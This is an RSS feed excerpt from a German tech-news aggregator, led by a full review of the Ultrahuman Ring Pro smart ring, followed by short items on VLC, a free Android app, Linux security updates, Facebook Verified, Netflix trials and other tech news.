<item>
<title><![CDATA[Ultrahuman Ring Pro im Test: Ohne Abonnement und langlebig]]></title>
<description><![CDATA[Mike Sawh



Auf einen Blick



Pro




Insgesamt solide Tracking-Leistung



Ansprechende Begleit-App mit einigen nützlichen Modi



Beeindruckende Akkulaufzeit



Ohne Abonnement




Kontra




Hoher Preis



Klobiges Design



Softwarefunktionen entsprechen weitgehend denen des Air




Fazit

...]]></description>
<link>https://tsecurity.de/de/3694425/it-security-nachrichten/ultrahuman-ring-pro-im-test-ohne-abonnement-und-langlebig/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694425/it-security-nachrichten/ultrahuman-ring-pro-im-test-ohne-abonnement-und-langlebig/</guid>
<pubDate>Sat, 25 Jul 2026 18:59:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.10.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200751" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<h3 class="wp-block-heading">Auf einen Blick</h3>



<h3 class="wp-block-heading">Pro</h3>



<ul class="wp-block-list">
<li>Insgesamt solide Tracking-Leistung</li>



<li>Ansprechende Begleit-App mit einigen nützlichen Modi</li>



<li>Beeindruckende Akkulaufzeit</li>



<li>Ohne Abonnement</li>
</ul>



<h3 class="wp-block-heading">Kontra</h3>



<ul class="wp-block-list">
<li>Hoher Preis</li>



<li>Klobiges Design</li>



<li>Softwarefunktionen entsprechen weitgehend denen des Air</li>
</ul>



<h3 class="wp-block-heading">Fazit</h3>



<p class="wp-block-paragraph">Der Ultrahuman Ring Pro bietet ein hervorragendes Hardware- und Software-Erlebnis und zählt damit zu den besten Smart-Ringen. Das Problem ist der hohe Anschaffungspreis, ganz zu schweigen davon, dass die Konkurrenz – sowohl bei Modellen mit als auch ohne Abonnement – für manche Nutzer attraktivere Eigenschaften bieten kann.</p>



<p class="wp-block-paragraph">Der Ultrahuman Ring Pro ist der neueste <a href="https://www.pcwelt.de/article/3063681/bester-smart-ring-test.html" target="_blank">Smart-Ring</a> eines Unternehmens, das sich seit Langem im Konflikt mit Oura befindet. Nachdem der Verkauf seines Vorgängermodells in den USA vorübergehend untersagt worden war, kehrt Ultrahuman nun mit einem neuen Ring zurück, der über neu gestaltete Sensoren, eine verbesserte Prozessorleistung und eine längere Akkulaufzeit verfügt.</p>



<p class="wp-block-paragraph">Der <a href="https://www.pcwelt.de/article/3063689/ultrahuman-ring-air-test-2.html" target="_blank">Ring Air</a> ist weiterhin als günstigere Alternative zum Pro erhältlich, doch wenn Sie das Beste wollen, was Ultrahuman zu bieten hat, ist dieser hier die richtige Wahl.</p>



<p class="wp-block-paragraph">Leider sind die Preise für die Ringe von Ultrahuman – ähnlich wie bei dem ebenfalls abonnementfreien Konkurrenten RingConn – leicht gestiegen, was bedeutet, dass sich der Pro wirklich hervorheben muss, um die höheren Kosten zu rechtfertigen und zu einer der ersten Wahl unter den Smart-Ringen zu werden.</p>



<h2 class="wp-block-heading">Design &amp; Verarbeitung</h2>



<ul class="wp-block-list">
<li>Erhältlich in vier Farbvarianten</li>



<li>Dickeres Design als der Ring Air</li>



<li>Ladeetui im Lieferumfang enthalten</li>
</ul>



<p class="wp-block-paragraph">Der Ring Pro ist ein Smart-Ring mit einem schlichten Design, der in vier verschiedenen Farben erhältlich ist: Bionic Gold, Space Silver, Aster Black und Raw Titanium. Der Kern des Rings besteht aus Titan mit einer PVD-Beschichtung, die ihn vor Kratzern schützt. Ich habe festgestellt, dass frühere Ultrahuman-Ringe zu den am leichtesten zu zerkratzenden gehörten. Daher freue ich mich, dass der Pro Kratzer besser abwehrt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.15.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200752" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Genau wie der Air ist auch der Pro in den Ringgrößen 5–14 erhältlich und bis zu einer Tiefe von 100 Metern wasserdicht. Ich habe mich für dieselbe Größe wie beim Air entschieden, und die Passform scheint ähnlich zu sein, wenn nicht sogar insgesamt etwas besser, da der Ring seltener an meinem Finger herumrutscht. Er ist sehr bequem und sitzt gut am Finger. Man spürt zwar die Sensoren, doch sie sind nicht so deutlich spürbar wie bei früheren Modellen.</p>



<p class="wp-block-paragraph">Im Vergleich zum Ring Air von Ultrahuman erhalten Sie einen schwereren und dickeren Ring. Da ich den <a href="https://www.pcwelt.de/article/3179739/oura-ring-5-test-review.html" target="_blank">Oura Ring 5</a> gleichzeitig getragen habe, wirkt der Pro deutlich größer als der neueste Ring von Oura.</p>



<p class="wp-block-paragraph">Der Pro wird mit einem Ladecase geliefert, und obwohl man es nicht mit dem neuen Case von Oura verwechseln würde, verfügt es über ein ähnlich robustes Metall-Design, das den Ring schützt, wenn er nicht am Finger getragen wird. Das Etui verfügt über zusätzliche intelligente Funktionen wie kabelloses Laden, einen „Find-my-Case“-Modus für den Fall, dass Sie es verlegen, ganz zu schweigen von der Möglichkeit, Ringdaten bis zu einem Jahr lang zu speichern.</p>



<p class="wp-block-paragraph">Ein interessanter Aspekt des Designs ist, dass Ultrahuman den Ring so konzipiert hat, dass er im Falle einer Schwellung leicht durchtrennt und entfernt werden kann. Auch wenn ich hoffe, dass niemand jemals in eine solche Situation gerät, ist es beruhigend zu wissen, dass sich der Ring in einem Notfall problemlos entfernen lässt.</p>



<h2 class="wp-block-heading">Fitness &amp; Tracking</h2>



<ul class="wp-block-list">
<li>Überarbeitete Temperatur- und Herzfrequenzsensoren</li>



<li>Neuer Dual-Core-Prozessor</li>



<li>Powerplugs bieten zusätzliche Funktionen gegen Aufpreis</li>
</ul>



<p class="wp-block-paragraph">Der Ring Pro kann so gut wie alles überwachen, was auch der Air kann. Dazu gehören Herzfrequenz, Schlaf, Stress, Temperatur und die tägliche Schrittzahl. Die größte Änderung besteht darin, dass die optischen Sensoren, die zur Erfassung dieser Messwerte verwendet werden, überarbeitet wurden und nun klarere Signale liefern, um Schlaf- und Erholungsdaten zu erfassen.</p>



<p class="wp-block-paragraph">Diese Neugestaltung scheint zudem mit den Patentstreitigkeiten mit Oura in Zusammenhang zu stehen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.19.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200753" width="1024" height="554" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Die App, die diese Daten anzeigt, gehört zu den ausgereiftesten, die Sie bei einem Smart-Ring finden können. Sie steht der Oura-App in nichts nach, was die ansprechende Aufbereitung Ihrer Daten angeht, und regt Sie dazu an, sich tatsächlich damit auseinanderzusetzen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.33.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200754" width="1024" height="571" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Was die Erfassung der Kerndaten angeht, müssen Sie die zweiwöchige Kalibrierungsphase unbedingt durchlaufen, bis Sie zuverlässige Ergebnisse erhalten. Die Daten zu den durchschnittlichen Herzfrequenzwerten wiesen während dieses Zeitraums erhebliche Abweichungen auf, stabilisierten sich jedoch nach diesen zwei Wochen.</p>



<p class="wp-block-paragraph">Die Daten zur Ruheherzfrequenz und die Messungen der Herzfrequenzvariabilität stimmten besonders gut mit zwei anderen Trackern überein, die ich parallel zum Pro trug.</p>



<p class="wp-block-paragraph">Bei der Betrachtung der Schrittzahlen stellte ich fest, dass die gemeldeten Gesamtwerte deutlich niedriger waren als bei zwei anderen Trackern, mit denen ich den Pro verglichen habe.</p>



<p class="wp-block-paragraph">Die Leistung bei der Schlafaufzeichnung gehört zu den besten, die ich getestet habe, einschließlich Oura. Was die Schlafdauer, die Aufschlüsselung der Schlafphasen und den erfassten Zeitpunkt des Einschlafens betrifft, lieferte der Pro zuverlässige Werte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.42.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200755" width="1024" height="543" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Ultrahuman hebt sich von der Konkurrenz dadurch ab, dass es komplexe Daten in einem leicht verständlichen Format darstellt, beispielsweise bei der Bewertung des Gehirnalters oder der Erfassung des Schlafdefizits, das sich aus kumulierten schlechten Nächten ergibt. Es überwacht zudem, wie gut Ihr Gehirn während des Schlafs Abfallstoffe abbaut. Sie können auch die „PowerPlugs“ von Ultrahuman erkunden, bei denen es sich größtenteils um kostenlose Add-ons handelt, die eine individuellere Nachverfolgung ermöglichen.</p>



<p class="wp-block-paragraph">Ich nutze derzeit das neue Parent-Modul, das besonders auf die kumulative Erholung achtet, berücksichtigt, dass der Schlaf wahrscheinlich unruhiger ist, und Ihnen Tipps gibt, wie Sie wieder in die richtige Bahn kommen können.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/Bildschirmfoto-2026-07-23-um-16.11.49.png?w=1024" alt="Ultrahuman Ring Pro" class="wp-image-4200756" width="1024" height="577" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Mike Sawh</p></div>



<p class="wp-block-paragraph">Wie bereits erwähnt, sind die meisten dieser PowerPlugs kostenlos. Es gibt jedoch auch solche, die Einblicke in spezielle Krankheiten wie Migräne bieten oder Daten mit einem Tesla synchronisieren; hierfür ist ein monatliches Abonnement erforderlich. Dabei handelt es sich um kostenpflichtige Funktionen, auf die die meisten Nutzer gut verzichten können.</p>



<h2 class="wp-block-heading">Akkulaufzeit &amp; Aufladen</h2>



<ul class="wp-block-list">
<li>Bis zu 15 Tage Akkulaufzeit</li>



<li>Bietet drei Akkubetriebsmodi</li>



<li>Ladeetui sorgt für weitere 45 Tage</li>
</ul>



<p class="wp-block-paragraph">Die Akkulaufzeit ist ein wichtiges Thema beim Pro-Modell – und das nicht nur, weil er länger durchhält als der Air. Neben der Verlängerung der Akkulaufzeit von 4–6 Tagen auf 15 Tage stehen Ihnen drei Akkubetriebsmodi zur Verfügung, mit denen Sie das Beste aus jeder Ladung herausholen können.</p>



<p class="wp-block-paragraph">Wenn Sie den Turbo-Modus wählen, bei dem alle Sensoren aktiviert sind, können Sie mit einer Laufzeit von bis zu 12 Tagen rechnen. Diese verlängert sich auf über 15 Tage, wenn Sie sich für den Chill-Akkumodus entscheiden. Dabei liegt der Schwerpunkt auf der Schlafaufzeichnung, doch wichtige Momente Ihres Tages werden weiterhin erfasst, um sicherzustellen, dass die wesentlichen Erkenntnisse weiterhin von Nutzen sind.</p>



<p class="wp-block-paragraph">Ich habe mit dem Pro problemlos eine Akkulaufzeit von fast zwei Wochen erreicht, was eine beeindruckende Leistung ist. Das ist besser als beim Oura Ring 5 und liegt in Bezug auf die Akkuleistung auf Augenhöhe mit dem <a href="https://www.pcwelt.de/article/3063223/ringconn-gen-2-test.html" target="_blank">RingConn Gen 2</a>.</p>



<p class="wp-block-paragraph">Zudem verfügen Sie nun über das Ladecase, das Ihnen eine zusätzliche Akkulaufzeit von 45 Tagen bietet. Sie müssen den Ring jedoch präzise im Ladegerät platzieren; ein akustisches Signal aus dem integrierten Lautsprecher bestätigt, dass der Ring wieder aufgeladen wird. Als der Akku auf 0 Prozent sank, benötigte der Pro weniger als eine Stunde, um wieder auf 100 Prozent zu kommen.</p>



<h2 class="wp-block-heading">Preis &amp; Verfügbarkeit</h2>



<p class="wp-block-paragraph">Zum Zeitpunkt der Erstellung dieses Artikels kann der Ultrahuman Ring Pro für 499 Euro im <a href="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html#" target="_blank">Ultrahuman Store</a> vorbestellt werden. Damit gehört er zu den teuersten Smart-Ringen auf dem Markt.</p>



<p class="wp-block-paragraph">Er ist teurer als das günstigste verfügbare Modell des Oura Ring 5 und andere Smart-Ringe wie der <a href="https://whttps//www.pcwelt.de/article/3062918/samsung-galaxy-ring-test.html" target="_blank" rel="noreferrer noopener">Samsung Galaxy Ring</a>. Der in Kürze erscheinende RingConn Gen 3 wird in den USA teurer sein als der Ring Pro, sollte in anderen Regionen jedoch günstiger sein.</p>



<p class="wp-block-paragraph">Wie der Ring Air bleibt auch der Pro ein Smart-Ring ohne Abonnement. Einige der PowerPlug-Software-Erweiterungen sind jedoch mit zusätzlichen Kosten verbunden.</p>



<h2 class="wp-block-heading">Sollten Sie den Ultrahuman Ring Pro kaufen?</h2>



<p class="wp-block-paragraph">Die großen Verbesserungen des Ring Pro gegenüber dem Air liegen in dem größeren Akku und dem robusteren Design. Ich habe die Überwachungsleistung des Air nie als unzureichend empfunden, und wenn Sie noch ein Exemplar ergattern können und ein Fan des Software-Ansatzes von Ultrahuman sind, dann ist er nach wie vor eine kluge (und günstigere) Anschaffung.</p>



<p class="wp-block-paragraph">Vergleicht man den Ring Pro mit anderen Smart-Ringen, müssen wir über den Preis sprechen. Er ist teuer, und es gibt abonnementsfreie Alternativen zu einem günstigeren Preis. Ob diese Ihnen auf der Softwareseite das gleiche Maß an Sorgfalt und Aufmerksamkeit bieten, ist fraglich. Genau hier setzt sich der Ring Pro gegenüber einem Großteil der Konkurrenz durch.</p>



<p class="wp-block-paragraph">Er ist vielleicht nicht der kleinste oder dünnste Ring, aber was der Ring Pro zu bieten hat, ist eine Kombination aus Hardware und Software, die ein hervorragendes Gesamtpaket ergibt.</p>



<h2 class="wp-block-heading">Technische Daten</h2>



<ul class="wp-block-list">
<li>Bis zu 15 Tage Akkulaufzeit</li>



<li>Kompatibel mit Android und iOS</li>



<li>Wasserdicht bis zu 100 Metern</li>



<li>2,65 mm dick</li>



<li>Gewicht: 3,3–4,8 g</li>



<li>Erfasst den Blutsauerstoffgehalt, die Herzfrequenz und die Körpertemperatur</li>



<li>Erfasst den Schlaf und die tägliche Aktivität</li>
</ul>



<p class="wp-block-paragraph">(<a href="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html" data-type="link" data-id="https://www.pcwelt.de/article/3181848/ultrahuman-ring-pro-test-review.html" target="_blank">PC-Welt</a>)</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[1.800 TV-Sender kostenlos: Diese VLC-Funktion kennen zu wenige]]></title>
<description><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></description>
<link>https://tsecurity.de/de/3694088/it-nachrichten/1800-tv-sender-kostenlos-diese-vlc-funktion-kennen-zu-wenige/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694088/it-nachrichten/1800-tv-sender-kostenlos-diese-vlc-funktion-kennen-zu-wenige/</guid>
<pubDate>Sat, 25 Jul 2026 17:17:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der VLC Media Player kann weit mehr als Videos abspielen. Ganz schnell wird er zum vollwertigen TV-Center mit 1.800 Sendern.]]></content:encoded>
</item>
<item>
<title><![CDATA[Statt 3,29 Euro aktuell kostenlos: Mit dieser Android-App könnt ihr es euren Nachbarn richtig zeigen]]></title>
<description><![CDATA[Im Google Play Store findet ihr unzählige Apps, die sehr viele Funktionen abdecken, die euer Handy nicht unterstützt, obwohl die technische Grundlage dafür geschaffen ist. Aktuell bekommt ihr mit Schallmesser eine Premium-App kostenlos, für die ihr normalerweise 3,29 Euro bezahlt. Damit könnt ihr...]]></description>
<link>https://tsecurity.de/de/3693486/android-tipps/statt-329-euro-aktuell-kostenlos-mit-dieser-android-app-koennt-ihr-es-euren-nachbarn-richtig-zeigen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693486/android-tipps/statt-329-euro-aktuell-kostenlos-mit-dieser-android-app-koennt-ihr-es-euren-nachbarn-richtig-zeigen/</guid>
<pubDate>Sat, 25 Jul 2026 10:15:08 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Im Google Play Store findet ihr unzählige Apps, die sehr viele Funktionen abdecken, die euer Handy nicht unterstützt, obwohl die technische Grundlage dafür geschaffen ist. Aktuell bekommt ihr mit Schallmesser eine Premium-App kostenlos, für die ihr normalerweise 3,29 Euro bezahlt. Damit könnt ihr die Lautstärke in Dezibel messen und eure lauten Nachbarn damit konfrontieren.]]></content:encoded>
</item>
<item>
<title><![CDATA[Matrix Tutorials #15 – Matrix on Kubernetes]]></title>
<description><![CDATA[Author: Matrixdotorg - Bewertung: 20x - Views:334 A few years ago we deployed Matrix with docker-compose. Now, let's give it a go on Kubernetes!

00:00 Introduction
01:40 Kubernetes Makes Things Simple
04:59 Getting Started
06:21 Installing Kubernetes
14:41 Deploying and Removing a Wordpress
20:5...]]></description>
<link>https://tsecurity.de/de/3693329/videos/matrix-tutorials-15-matrix-on-kubernetes/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693329/videos/matrix-tutorials-15-matrix-on-kubernetes/</guid>
<pubDate>Sat, 25 Jul 2026 08:42:07 +0200</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Matrixdotorg - Bewertung: 20x - Views:334 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/mMsyF3bQqWs?autoplay=1&origin=https://tsecurity.de" frameborder="0"></iframe></p><p>A few years ago we deployed Matrix with docker-compose. Now, let&#039;s give it a go on Kubernetes!<br />
<br />
00:00 Introduction<br />
01:40 Kubernetes Makes Things Simple<br />
04:59 Getting Started<br />
06:21 Installing Kubernetes<br />
14:41 Deploying and Removing a Wordpress<br />
20:53 Deploying A Matrix Stack<br />
31:02 More Services Almost For Free<br />
<br />
This Week in Matrix: https://matrix.org/twim<br />
<br />
Find Matrix.org on the internet:<br />
🐘 https://mastodon.matrix.org/@matrix<br />
🤝 https://www.linkedin.com/company/matrix-org<br />
🦋 https://bsky.app/profile/matrix.org<br />
[m] Office of the Matrix Foundation https://matrix.to/#/%23foundation-office:matrix.org<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Facebook Verified: Meta startet kostenloses Abzeichen für echte Nutzer]]></title>
<description><![CDATA[Meta hat mit „Facebook Verified“ ein neues Abzeichen vorgestellt, das anzeigen soll, dass hinter einem Facebook-Profil ein realer Mensch steckt und kein KI-generiertes Fake-Konto. Die Verifizierung ist kostenlos und richtet sich ausschließlich an persönliche Profile. Ein Video-Selfie dient als Ec...]]></description>
<link>https://tsecurity.de/de/3692314/ios-mac-os/facebook-verified-meta-startet-kostenloses-abzeichen-fuer-echte-nutzer/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692314/ios-mac-os/facebook-verified-meta-startet-kostenloses-abzeichen-fuer-echte-nutzer/</guid>
<pubDate>Fri, 24 Jul 2026 20:48:49 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Meta hat mit „Facebook Verified“ ein neues Abzeichen vorgestellt, das anzeigen soll, dass hinter einem Facebook-Profil ein realer Mensch steckt und kein KI-generiertes Fake-Konto. Die Verifizierung ist kostenlos und richtet sich ausschließlich an persönliche Profile. Ein Video-Selfie dient als Echtheitsnachweis Wer das Abzeichen erhalten möchte, nimmt ein kurzes Video-Selfie auf, das Meta anschließend mit den […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in docker (SUSE)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3692040/unix-server/security-mehrere-probleme-in-docker-suse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692040/unix-server/security-mehrere-probleme-in-docker-suse/</guid>
<pubDate>Fri, 24 Jul 2026 18:32:18 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (glibc, java-21-openjdk, kernel, and libpq), Debian (imagemagick, spice-vdagent, and webkit2gtk), Fedora (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), Mageia (apache, cifs-utils, dnsmasq, lrzip, and s...]]></description>
<link>https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691648/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 24 Jul 2026 15:13:19 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (glibc, java-21-openjdk, kernel, and libpq), <b>Debian</b> (imagemagick, spice-vdagent, and webkit2gtk), <b>Fedora</b> (cryptlib, dotnet8.0, dotnet9.0, firefox, python-black, python-lsp-black, and python-pytokens), <b>Mageia</b> (apache, cifs-utils, dnsmasq, lrzip, and socat), <b>Oracle</b> (.NET 10.0, .NET 9.0, 389-ds-base, cups, edk2, fence-agents, firefox, freeipmi, freerdp, git-lfs, glib2, gnutls, golang, gstreamer1-plugins-bad-free, gstreamer1-plugins-good, gstreamer1-plugins-ugly-free, hplip, libinput, libvirt, libxml2, memcached, nginx, openexr, perl-DBI, perl-XML-LibXML, php, php8.4, plexus-utils, postgresql16, python3.12, python3.14, sssd, tomcat, tomcat9, unbound, vim, xorg-x11-server-Xwayland, yggdrasil, and yggdrasil-worker-package-manager), <b>Red Hat</b> (container-tools:rhel8, git-lfs, go-toolset:rhel8, golang, golang-github-openprinting-ipp-usb, grafana, grafana-pcp, host-metering, java-1.8.0-openjdk, java-11-openjdk with Extended Lifecycle Support, java-17-openjdk, java-21-openjdk, oci-seccomp-bpf-hook, rhc, rhc-worker-playbook, skopeo, xorg-x11-server, xorg-x11-server-Xwayland, and yggdrasil), <b>Slackware</b> (mozilla-thunderbird), <b>SUSE</b> (afterburn, alloy, apache-sshd, apache2, avahi, chromium, clamav, curl, dhcpcd, dnsmasq, docker-compose, ffmpeg-7, firefox-esr, gawk, glibc, gnutls, go1.26-openssl, google-osconfig-agent, gpg2, haproxy, ImageMagick, imagemagick, jline3, jq, kernel, libgcrypt, libgnt, meson, pidgin, nmap, nodejs24, pacemaker, patch, perl-HTML-Parser, perl-libwww-perl, perl-List-SomeUtils-XS, python-aiohttp, python-WebOb, qemu, rust-keylime, SVT-AV1, libyuv0, libaom3, trivy, ucode-intel, and wireshark), and <b>Ubuntu</b> (libhttp-date-perl, libxpm, linux-azure, linux-azure-fde, pam, and rsyslog).]]></content:encoded>
</item>
<item>
<title><![CDATA[Digital Bash – Cyber Security | 06.08.2026 - OnlineMarketing.de]]></title>
<description><![CDATA[Praxisnahe Einblicke in moderne Cyber Security, sichere KI-Nutzung und belastbare Sicherheitsprozesse – kostenlos beim Digital Bash am 06. August.]]></description>
<link>https://tsecurity.de/de/3691595/it-security-nachrichten/digital-bash-cyber-security-06082026-onlinemarketingde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691595/it-security-nachrichten/digital-bash-cyber-security-06082026-onlinemarketingde/</guid>
<pubDate>Fri, 24 Jul 2026 14:59:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Praxisnahe Einblicke in moderne <b>Cyber Security</b>, sichere KI-Nutzung und belastbare Sicherheitsprozesse – kostenlos beim Digital Bash am 06. August.]]></content:encoded>
</item>
<item>
<title><![CDATA[LHB Linux Digest #26.09: Docker Compose Override, Claude Skills for DevOps, Solidtime and More]]></title>
<description><![CDATA[Override the compose]]></description>
<link>https://tsecurity.de/de/3691440/linux-tipps/lhb-linux-digest-2609-docker-compose-override-claude-skills-for-devops-solidtime-and-more/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691440/linux-tipps/lhb-linux-digest-2609-docker-compose-override-claude-skills-for-devops-solidtime-and-more/</guid>
<pubDate>Fri, 24 Jul 2026 13:44:12 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Override the compose]]></content:encoded>
</item>
<item>
<title><![CDATA[Neue Plattform von Jack Dorsey: Buzz will Funktionen von Slack und Github vereinen]]></title>
<description><![CDATA[Mit der App will der Twitter-Mitgründer einen zentralen Ort für die Zusammenarbeit zwischen Menschen und KI-Agenten schaffen. Die Open-Source-Lösung ist kostenlos und mit den KI-Modellen anderer Anbieter kompatibel.
weiterlesen auf t3n.de]]></description>
<link>https://tsecurity.de/de/3691399/it-nachrichten/neue-plattform-von-jack-dorsey-buzz-will-funktionen-von-slack-und-github-vereinen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691399/it-nachrichten/neue-plattform-von-jack-dorsey-buzz-will-funktionen-von-slack-und-github-vereinen/</guid>
<pubDate>Fri, 24 Jul 2026 13:34:28 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Mit der App will der Twitter-Mitgründer einen zentralen Ort für die Zusammenarbeit zwischen Menschen und KI-Agenten schaffen. Die Open-Source-Lösung ist kostenlos und mit den KI-Modellen anderer Anbieter kompatibel.
<a href="https://t3n.de/news/neue-plattform-von-jack-dorsey-buzz-will-funktionen-von-slack-und-github-vereinen-1754678/?utm_source=rss&amp;utm_medium=newsFeed&amp;utm_campaign=newsFeed">weiterlesen auf t3n.de</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix testet wieder kostenlose Probeabos – bis zu 30 Tage gratis]]></title>
<description><![CDATA[Ein Netflix-Abo hat mittlerweile so gut wie jeder, doch der eine oder andere wartet vielleicht noch auf eine Möglichkeit, das Streaming-Angebot kostenlos zu testen. Das war seit den Anfängen von Netflix nicht mehr möglich, doch jetzt gibt es wieder einen kostenlosen Probezeitraum.



Bis zu 30 Ta...]]></description>
<link>https://tsecurity.de/de/3691064/it-nachrichten/netflix-testet-wieder-kostenlose-probeabos-bis-zu-30-tage-gratis/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691064/it-nachrichten/netflix-testet-wieder-kostenlose-probeabos-bis-zu-30-tage-gratis/</guid>
<pubDate>Fri, 24 Jul 2026 11:03:16 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Ein Netflix-Abo hat mittlerweile so gut wie jeder, doch der eine oder andere wartet vielleicht noch auf eine Möglichkeit, das Streaming-Angebot kostenlos zu testen. Das war seit den Anfängen von Netflix nicht mehr möglich, doch jetzt gibt es wieder einen kostenlosen Probezeitraum.</p>



<p>Bis zu 30 Tage können Sie den Streamingtest jetzt kostenlos nutzen. Teilweise werden auch nur 14 Tage angeboten, der Gratis-Zeitraum scheint also je nach Standort oder genutztem Browser zu variieren. Auf der Webseite von <a href="https://www.netflix.com/de/" target="_blank" rel="noreferrer noopener">Netflix Deutschland</a> wurden uns auch nur 14 Tage für 0 Euro angezeigt. Es kann aber helfen, wenn Sie auf ein anderes Gerät wechseln oder Cookies löschen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a632a1fb8d37"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/07/image_742287.png?w=1200" alt="" class="wp-image-3197988" width="1200" height="562" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
